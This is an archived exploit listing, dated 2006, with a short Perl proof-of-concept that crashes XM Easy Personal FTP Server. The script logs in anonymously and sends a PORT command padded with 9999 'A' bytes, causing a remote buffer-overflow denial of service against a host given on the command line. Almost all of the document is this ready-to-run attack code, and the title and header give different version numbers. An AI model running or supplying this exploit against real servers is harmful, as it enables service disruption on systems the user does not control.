XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC

2006-03-04 00:00:00

#!/usr/bin/perl

# ---------------------------------------------------- #
# Name : XM Easy Personal FTP Server #
# Version : 4.2 #
# ---------------------------------------------------- #
# Type : dos / remote #
# Descritpion : buffer overflow for huge PORT value #
# ---------------------------------------------------- #
# luka.research - id:28022006001 #
# ---------------------------------------------------- #

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
$ftp = Net::FTP->new($host, Debug => 0);
$ftp->login("anonymous",'[email protected]');
$ftp->port("\x41"x9999);
}
else {
print "\n- XM Easy Personal FTP Server 4.2 - PoC Exploit\n- Using: $0 host\n";
}

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.